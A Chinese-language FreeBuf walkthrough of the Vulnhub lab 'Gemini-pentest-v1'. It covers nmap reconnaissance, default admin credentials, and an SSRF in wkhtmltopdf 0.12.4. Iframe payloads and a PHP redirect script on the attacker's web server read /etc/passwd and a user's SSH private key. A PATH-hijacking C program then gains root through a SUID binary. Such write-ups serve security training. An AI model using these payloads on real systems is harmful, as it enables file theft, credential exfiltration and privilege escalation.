官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
Vulnhub靶场攻略---Gemini-pentest-v1
- 关注
Vulnhub靶场攻略---Gemini-pentest-v1
信息收集
└─\# cat nmapscan/info
# Nmap 7.93 scan initiated Tue Aug 1 20:31:00 2023 as: nmap -sT -sV -sC -O -p22,80 -o nmapscan/info 10.20.22.135
Nmap scan report for 10.20.22.135
Host is up (0.00053s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e9e389b63beae413c8ac3844d6eac0e4 (RSA)
| 256 8c1977fd36727e3446c4292d2aac1598 (ECDSA)
|_ 256 cc2b4cced76173d7d87e245674549988 (ED25519)
80/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2018-01-07 08:35 test2/
|_
|_http-title: Index of /
MAC Address: 00:0C:29:59:6C:63 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 1 20:31:08 2023 -- 1 IP address (1 host up) scanned in 9.06 seconds
//服务器开放了80,22端口
端口渗透
web-80端口渗透
访问首页出现test2目录访问后是一个用于导出PDF文件的内容管理系统,并且在github中保存了源码。
通过查看源码找到了install.php
if(!isset($page->error)) {
$page->success = "The installation was successful ! Thank you for using master loging system and we hope you enjo it ! Have fun ! <br/><br/>
<a class='btn btn-success' href='./index.php'>Start exploring</a>
<br/><br/>
<h3>USER: admin <br/> PASSWORD: 1234</h3>";
}
在源码中 提到安装完成后会跳转到index.php文件并且有一个初始的admin用户和密码
使用admin用户成功登录并且找到了可以导出admin用户的pdf文件
导出pdf文件使用的是wkhtmltopdf 0.12.4查找后的到此程序存在SSRF(Server-Side Resquest Forgery)服务器端请求伪造,有攻击者构造,服务器端发起请求的安全漏洞。
SSRF漏洞
漏洞原理
由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。
此处的wkhtnltopdf就可实现使用iframe标签,修改Display name内容向其他服务器请求,并实现本地文件读取。
漏洞利用
本地读取
<iframe heignt="2000" width="800" src="file:///etc/passwd"></iframe>
本地读取无回显
远程读取
<?php header('location:file://'.$_REQUEST['uri']); ?>
<iframe height="2000" width="800" src="kali临时web服务/shell.php?uri=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
geoclue:x:109:115::/var/lib/geoclue:/bin/false
avahi:x:112:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:120:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:114:121::/var/lib/saned:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:122:Gnome Display Manager:/var/lib/gdm3:/bin/false
gemini1:x:1000:1000:gemini-sec,,,:/home/gemini1:/bin/bash
sshd:x:117:65534::/run/sshd:/usr/sbin/nologin
mysql:x:118:123:MySQL Server,,,:/nonexistent:/bin/false
成功读取到目标服务器的文件内容,服务器中存在一个gemini1用户,存在ssh服务,所以想到查看该用户的ssh密钥文件。
/home/gemini1/.ssh/id_rsa
通过远程读取成功获取到gemini1用户的密钥文件
<iframe height="2000" width="800" src="http://10.20.30.129:800/she.php?uri=/home/gemini1/.ssh/id_rsa"></iframe>
ssh-22端口渗透
└─\# ssh -i id_rsa gemini1@10.20.30.128
Linux geminiinc 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug 5 20:48:06 2023 from 10.20.30.129
gemini1@geminiinc:~$
拿到用户初始权限
权限提升
SUID环境变量提权
gemini1@geminiinc:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/apache2/suexec-pristine
/usr/lib/apache2/suexec-custom
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/listinfo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/bin/mount
/bin/umount
/bin/ping
/bin/su
/bin/fusermount
首先发现了/usr/lib/dbus-1.0/dbus-daemon-launch-helper使用该利用需要输入密码,在系统中一直查找也没有找到利用的密码。
继续遍历SUID文件,使用/usr/bin/listinfo
gemini1@geminiinc:~$ /usr/bin/listinfo
displaying network information... inet 10.20.30.128 netmask 255.255.255.0 broadcast 10.20.30.255
displaying network information... inet6 fe80::20c:29ff:fe59:6c63 prefixlen 64 scopeid 0x20<link>
displaying network information... inet 127.0.0.1 netmask 255.0.0.0
displaying network information... inet6 ::1 prefixlen 128 scopeid 0x10<host>
displaying Apache listening port... tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
displaying Apache listening port... tcp6 0 0 :::22 :::* LISTEN
displaying SSH listening port... tcp6 0 0 :::80 :::* LISTEN
displaying current date... Sat Aug 5 22:32:02 EDT 2023
此程序会输出网卡信息,端口监听信息,以及日期信息,继续追踪文件执行内容
/sbin/ifconfig | grep inet
/bin/netstat -tuln | grep 22
/bin/netstat -tuln | grep 80
date
这里的命令ifconfig和netstat都使用了绝对路径执行,但是date命令使用的是相对路径执行,所以可以使用添加环境变量,使系统调用的date命令是我指定的date命令,可以将date命令变成提权代码让系统执行。
#include<stdlib.h>
#include<sys/types.h>
#include<unistd.h>
int main(){
setgid(0);
setuid(0);
system("/bin/bash");
}
gemini1@geminiinc:~$ gcc date.c -o date
gemini1@geminiinc:~$ export PATH=.:$PATH
gemini1@geminiinc:~$ echo $PATH
.:././usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
gemini1@geminiinc:~$ /usr/bin/listinfo
displaying network information... inet 10.20.30.128 netmask 255.255.255.0 broadcast 10.20.30.255
displaying network information... inet6 fe80::20c:29ff:fe59:6c63 prefixlen 64 scopeid 0x20<link>
displaying network information... inet 127.0.0.1 netmask 255.0.0.0
displaying network information... inet6 ::1 prefixlen 128 scopeid 0x10<host>
displaying Apache listening port... tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
displaying Apache listening port... tcp6 0 0 :::22 :::* LISTEN
displaying SSH listening port... tcp6 0 0 :::80 :::* LISTEN
root@geminiinc:~\# whoami
displaying current date... root
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
- 0 文章数
- 0 关注者
文章目录